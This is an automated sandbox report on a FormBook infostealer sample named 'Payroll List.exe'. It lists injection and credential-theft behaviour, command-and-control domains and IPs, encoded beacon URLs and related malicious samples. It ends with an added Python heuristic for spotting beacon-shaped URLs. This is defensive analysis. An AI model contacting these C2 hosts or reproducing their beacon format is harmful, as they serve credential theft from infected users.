                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | [412] Process Injection | [2] Valid Accounts | Cached Domain Credentials | [2] Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | [2] Virtualization/Sandbox Evasion | DCSync | [3] Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | [21] Access Token Manipulation | Proc Filesystem | [1] Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | [412] Process Injection | /etc/passwd and /etc/shadow | [1] System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph (ID: 1560911; Sample: Payroll List.exe; Start date: 22/11/2024; Architecture: WINDOWS; Score: 100)
                Sample-level nodes: www.schedulemassage.xyz, www.huiguang.xyz and 13 other IPs or domains; Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures; Performs DNS queries to domains with low reputation (www.huiguang.xyz)
                Process chain: Payroll List.exe (started: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process) -> svchost.exe (started: Maps a DLL or memory area into another process) -> eLiCpwzRIeWAs.exe (injected: Found direct / indirect Syscall (likely to bypass EDR)) -> ktmutil.exe (started: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures) and srdelayed.exe (started) -> from ktmutil.exe: eLiCpwzRIeWAs.exe (injected: Found direct / indirect Syscall (likely to bypass EDR)) and firefox.exe (started)
                Network from the injected eLiCpwzRIeWAs.exe: www.telforce.one 64.190.63.222 (ports 49741, 49742, 80; NBS11696US, United States); migorengya8.click 198.252.98.54 (ports 49725, 49726, 49727; HAWKHOSTCA, Canada); 6 other IPs or domains

                Source | Detection | Scanner | Label | Link
                Payroll List.exe | 58% | ReversingLabs | Win32.Trojan.AutoitInject |
                Payroll List.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu | 0% | Avira URL Cloud | safe |
                http://www.migorengya8.click/y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dt | 0% | Avira URL Cloud | safe |
                http://www.servannto.site/h26k/ | 0% | Avira URL Cloud | safe |
                http://www.migorengya8.click/y3dc/ | 0% | Avira URL Cloud | safe |
                http://www.klohk.tech/3m3e/ | 0% | Avira URL Cloud | safe |
                https://34.92.79.175:19817 | 0% | Avira URL Cloud | safe |
                http://www.futurevision.life/hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dt | 0% | Avira URL Cloud | safe |
                http://www.futurevision.life/hxmz/ | 0% | Avira URL Cloud | safe |
                http://www.telforce.one/ykhz/ | 0% | Avira URL Cloud | safe |
                http://www.huiguang.xyz/hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dt | 0% | Avira URL Cloud | safe |
                http://www.d63dm.top/rqnz/ | 0% | Avira URL Cloud | safe |
                http://www.beingandbecoming.ltd/79tr/ | 0% | Avira URL Cloud | safe |
                http://www.beingandbecoming.ltd/79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt | 0% | Avira URL Cloud | safe |
                http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt | 0% | Avira URL Cloud | safe |
                http://www.d63dm.top/rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dt | 0% | Avira URL Cloud | safe |
                http://www.mcfunding.org/0598/ | 0% | Avira URL Cloud | safe |
                http://www.servannto.site/h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ== | 0% | Avira URL Cloud | safe |
                http://www.telforce.one | 0% | Avira URL Cloud | safe |
                http://www.mcfunding.org/0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q== | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                mcfunding.org | 3.33.130.190 | true | true | | unknown
                d63dm.top | 154.23.184.218 | true | true | | unknown
                www.huiguang.xyz | 154.216.76.80 | true | false | | high
                www.servannto.site | 31.31.196.17 | true | true | | unknown
                www.klohk.tech | 103.224.182.242 | true | false | | high
                www.telforce.one | 64.190.63.222 | true | true | | unknown
                beingandbecoming.ltd | 3.33.130.190 | true | true | | unknown
                migorengya8.click | 198.252.98.54 | true | true | | unknown
                www.futurevision.life | 203.161.49.193 | true | false | | high
                schedulemassage.xyz | 3.33.130.190 | true | true | | unknown
                www.beingandbecoming.ltd | unknown | unknown | false | | unknown
                www.migorengya8.click | unknown | unknown | false | | unknown
                www.mcfunding.org | unknown | unknown | false | | unknown
                www.d63dm.top | unknown | unknown | false | | unknown
                www.schedulemassage.xyz | unknown | unknown | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.migorengya8.click/y3dc/ | true | Avira URL Cloud: safe | unknown
                http://www.futurevision.life/hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dt | true | Avira URL Cloud: safe | unknown
                http://www.servannto.site/h26k/ | true | Avira URL Cloud: safe | unknown
                http://www.migorengya8.click/y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dt | true | Avira URL Cloud: safe | unknown
                http://www.futurevision.life/hxmz/ | true | Avira URL Cloud: safe | unknown
                http://www.klohk.tech/3m3e/ | true | Avira URL Cloud: safe | unknown
                http://www.huiguang.xyz/hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dt | true | Avira URL Cloud: safe | unknown
                http://www.telforce.one/ykhz/ | true | Avira URL Cloud: safe | unknown
                http://www.servannto.site/h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ== | true | Avira URL Cloud: safe | unknown
                http://www.beingandbecoming.ltd/79tr/ | true | Avira URL Cloud: safe | unknown
                http://www.beingandbecoming.ltd/79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt | true | Avira URL Cloud: safe | unknown
                http://www.mcfunding.org/0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q== | true | Avira URL Cloud: safe | unknown
                http://www.d63dm.top/rqnz/ | true | Avira URL Cloud: safe | unknown
                http://www.mcfunding.org/0598/ | true | Avira URL Cloud: safe | unknown
                http://www.d63dm.top/rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dt | true | Avira URL Cloud: safe | unknown
                http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://duckduckgo.com/ac/?q= | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://34.92.79.175:19817 | ktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp; eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp; firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu | eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003B80000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://www.ecosia.org/newtab/ | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://ac.ecosia.org/autocomplete?q= | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://www.telforce.one | eLiCpwzRIeWAs.exe, 00000007.00000002.3295460520.00000000052E3000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a | ktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp; eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp; firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmp | false | none | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.49.193 | www.futurevision.life | Malaysia | 45899 | VNPT-AS-VN VNPT Corp VN | false
31.31.196.17 | www.servannto.site | Russian Federation | 197695 | AS-REGRU | true
103.224.182.242 | www.klohk.tech | Australia | 133618 | TRELLIAN-AS-AP Trellian Pty Limited AU | false
198.252.98.54 | migorengya8.click | Canada | 20068 | HAWKHOST CA | true
64.190.63.222 | www.telforce.one | United States | 11696 | NBS11696 US | true
154.216.76.80 | www.huiguang.xyz | Seychelles | 132839 | POWERLINE-AS-AP POWERLINE DATACENTER HK | false
154.23.184.218 | d63dm.top | United States | 174 | COGENT-174 US | true
3.33.130.190 | mcfunding.org | United States | 8987 | AMAZON EXPANSION GB | true
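The beacon URIs in this report (www.klohk.tech/3m3e/?NjHpTfh=...&1fo=..., and in the context tables www.futurevision.life/hxmz/?jD=...&1H=... and www.futurevision.life/cadc/?mRu=...&UJ=...) share one shape: a single four-character path segment and exactly two query parameters, one carrying a long base64-looking blob. The following is an added hunting heuristic written for this page, not Joe Sandbox code and not a FormBook specification; it is derived only from the URIs visible here, and the context-table entries are given an assumed "http://" scheme because the report shows them without one. Note that the report's own URL table rates the klohk.tech URL "Malicious: false" and Avira "safe", so a shape match is a lead for the analyst, not a verdict.

```python
import re
from urllib.parse import urlsplit

# Constructed input, assembled from URLs in this report's URL table and from
# the context column of the associated-sample tables. The context entries
# carry no scheme in the report; "http://" is assumed here.
OBSERVED = [
    "http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt",
    "http://www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=",
    "http://www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM",
    "https://duckduckgo.com/ac/?q=",
    "https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a",
    "http://www.telforce.one",
]

# Shape shared by the beacon URIs above: one 4-character path segment,
# exactly two query parameters with short alphanumeric names, one value a
# long base64-looking blob, the other a short alphanumeric token.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9]{1,8}$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{1,16}$")


def split_query(query: str) -> list:
    """Split a query string without decoding: urllib's parse_qsl would turn
    '+' into a space and corrupt the base64 blob we want to inspect."""
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def looks_like_formbook_beacon(url: str) -> bool:
    """True when the URL has the path/query shape of the beacons in this report."""
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    pairs = split_query(parts.query)
    if len(pairs) != 2 or not all(KEY_RE.match(k) for k, _ in pairs):
        return False
    blobs = [v for _, v in pairs if BLOB_RE.match(v)]
    tokens = [v for _, v in pairs if TOKEN_RE.match(v)]
    return len(blobs) == 1 and len(tokens) == 1


def flagged_hosts(urls) -> list:
    """Distinct hosts whose URLs match the heuristic, sorted for stable output."""
    return sorted({urlsplit(u).hostname for u in urls if looks_like_formbook_beacon(u)})


if __name__ == "__main__":
    for host in flagged_hosts(OBSERVED):
        print("beacon-shaped URI seen for", host)
```

Run the same function over proxy or DNS-plus-URL logs to surface other hosts in the campaign's rotation (the context tables list several: www.servannto.site/h26k/, www.dverkom.store/7hot/, www.harmonid.life/aq3t/), then confirm against the process memory strings before acting on a match.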
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1560911
                                                                  Start date and time:2024-11-22 14:43:03 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 40s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
Number of new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Payroll List.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@9/3@11/8
                                                                  EGA Information:
                                                                  • Successful, ratio: 75%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 44
                                                                  • Number of non-executed functions: 300
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target eLiCpwzRIeWAs.exe, PID 5964 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • VT rate limit hit for: Payroll List.exe
                                                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.161.49.193 | MV KODCO.exe | malicious | FormBook | www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=
203.161.49.193 | PO 20495088.exe | malicious | FormBook | www.inspires.website/tv3i/
203.161.49.193 | Arrival Notice_pdf.exe | malicious | FormBook | www.futurevision.life/hxmz/
203.161.49.193 | PROFORMA INVOICE.exe | malicious | FormBook | www.futurevision.life/hxmz/
203.161.49.193 | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
203.161.49.193 | Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | malicious | FormBook, GuLoader | www.eco-tops.website/n54u/
203.161.49.193 | Shipping documents..exe | malicious | FormBook | www.futurevision.life/hxmz/
203.161.49.193 | DHL_IMPORT_8236820594.exe | malicious | FormBook | www.harmonid.life/aq3t/
203.161.49.193 | DHL_IMPORT_8236820594.exe | malicious | FormBook | www.harmonid.life/aq3t/
203.161.49.193 | Statement Cargomind 2024-09-12 (K07234).exe | malicious | FormBook | www.fitlifa.xyz/6tsn/
31.31.196.17 | PROFORMA INVOICE.exe | malicious | FormBook | www.servannto.site/h26k/
31.31.196.17 | Shipping documents..exe | malicious | FormBook | www.servannto.site/h26k/
31.31.196.17 | wODub61gZe.exe | malicious | FormBook | www.dverkom.store/sflr/
31.31.196.17 | r6lOHDg9N9.exe | malicious | FormBook | www.dverkom.store/p6ze/
31.31.196.17 | URGENT REQUEST FOR QUOTATION.exe | malicious | FormBook | www.dverkom.store/66j2/
31.31.196.17 | FW CMA SHZ Freight invoice CHN1080769.exe | malicious | FormBook | www.dverkom.store/66j2/
31.31.196.17 | Purchase_Order_pdf.exe | malicious | FormBook | www.dverkom.store/fbcx/
31.31.196.17 | SALARY OF OCT 2024.exe | malicious | FormBook | www.servannto.site/h26k/
31.31.196.17 | 3wgZ0nlbTe.exe | malicious | FormBook | www.dverkom.store/7hot/
31.31.196.17 | RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exe | malicious | FormBook | www.dverkom.store/7hot/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.servannto.site | PROFORMA INVOICE.exe | malicious | FormBook | 31.31.196.17
www.servannto.site | Shipping documents..exe | malicious | FormBook | 31.31.196.17
www.servannto.site | SALARY OF OCT 2024.exe | malicious | FormBook | 31.31.196.17
www.huiguang.xyz | MV KODCO.exe | malicious | FormBook | 154.92.61.37
www.huiguang.xyz | Arrival Notice_pdf.exe | malicious | FormBook | 154.92.61.37
www.huiguang.xyz | PROFORMA INVOICE.exe | malicious | FormBook | 154.92.61.37
www.huiguang.xyz | rGO880-PDF.exe | malicious | FormBook | 154.92.61.37
www.huiguang.xyz | Shipping documents..exe | malicious | FormBook | 154.92.61.37
www.huiguang.xyz | SALARY OF OCT 2024.exe | malicious | FormBook | 154.92.61.37
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TRELLIAN-AS-AP Trellian Pty Limited AU | Thermo Fisher Scientific - Ajánlatkérés.exe | malicious | FormBook | 103.224.182.242
TRELLIAN-AS-AP Trellian Pty Limited AU | DOC_114542366.vbe | malicious | FormBook | 103.224.182.242
TRELLIAN-AS-AP Trellian Pty Limited AU | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 103.224.182.242
TRELLIAN-AS-AP Trellian Pty Limited AU | PROFORMA INVOICE.exe | malicious | FormBook | 103.224.182.242
TRELLIAN-AS-AP Trellian Pty Limited AU | Item-RQF-9456786.exe | malicious | Unknown | 103.224.182.242
TRELLIAN-AS-AP Trellian Pty Limited AU | 8dPlV2lT8o.exe | malicious | Simda Stealer | 103.224.182.252
TRELLIAN-AS-AP Trellian Pty Limited AU | 7ObLFE2iMK.exe | malicious | Simda Stealer | 103.224.182.252
TRELLIAN-AS-AP Trellian Pty Limited AU | UMwpXhA46R.exe | malicious | Simda Stealer | 103.224.182.252
TRELLIAN-AS-AP Trellian Pty Limited AU | 1fWgBXPgiT.exe | malicious | Simda Stealer | 103.224.182.252
TRELLIAN-AS-AP Trellian Pty Limited AU | arxtPs1STE.exe | malicious | Simda Stealer | 103.224.182.252
AS-REGRU | HXpVpoC9cr.exe | malicious | FormBook | 31.31.198.145
AS-REGRU | Delivery_Notification_00000207899.doc.js | malicious | Unknown | 194.58.112.173
AS-REGRU | F8TXbAdG3G.exe | malicious | CredGrabber, Meduza Stealer | 195.133.18.88
AS-REGRU | PROFORMA INVOICE.exe | malicious | FormBook | 31.31.196.17
AS-REGRU | Item-RQF-9456786.exe | malicious | Unknown | 194.58.112.174
AS-REGRU | PO AT-5228.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | shipping doc_20241111.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | file_1443.exe | malicious | DCRat, PureLog Stealer, zgRAT | 194.58.42.154
AS-REGRU | lsass.exe | malicious | DCRat, PureLog Stealer, zgRAT | 194.58.42.154
AS-REGRU | yakuza.i686.elf | malicious | Unknown | 212.24.36.97
VNPT-AS-VN VNPT Corp VN | arm7.nn-20241122-0008.elf | malicious | Mirai, Okiru | 123.23.95.241
VNPT-AS-VN VNPT Corp VN | Thermo Fisher Scientific - Ajánlatkérés.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VN VNPT Corp VN | ppc.elf | malicious | Mirai | 14.245.235.111
VNPT-AS-VN VNPT Corp VN | x86_64.elf | malicious | Mirai | 123.25.106.125
VNPT-AS-VN VNPT Corp VN | i486.elf | malicious | Mirai | 113.175.131.151
VNPT-AS-VN VNPT Corp VN | DOC_114542366.vbe | malicious | FormBook | 203.161.43.228
VNPT-AS-VN VNPT Corp VN | A2028041200SD.exe | malicious | FormBook | 202.92.5.23
VNPT-AS-VN VNPT Corp VN | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 203.161.46.205
VNPT-AS-VN VNPT Corp VN | need quotations.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VN VNPT Corp VN | exe009.exe | malicious | Emotet | 113.161.148.81
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\ktmutil.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1209886597424439
                                                                  Encrypted:false
                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Payroll List.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):288256
                                                                  Entropy (8bit):7.99290766412211
                                                                  Encrypted:true
                                                                  SSDEEP:6144:mnetfYEEZlwShUhJo7TdmDzreAtPYvwT6WlyHfg2pizQjEvP:Qetb0hOJo7TdwDiwTHlyI2I0jEH
                                                                  MD5:7B6C3967EE26BAC291D585DAE2BCB6FD
                                                                  SHA1:7153F3FB7FEE5960A632AB6030A2CE37D4843A39
                                                                  SHA-256:809BCF736D090990DC4A3A1D9FBFE97B5E2BFB9FEEF5E7F46A8AFD6DC6201AC8
                                                                  SHA-512:339A7D09517CF270F9E9500F0E39CA1DB6385AE19C7E14A152B6F93D7EDC755AD5DBA97A76A5F75516DAFF7A6A220DB25B25212B7397C4DD16AE2FB2F9B37F12
                                                                  Malicious:false
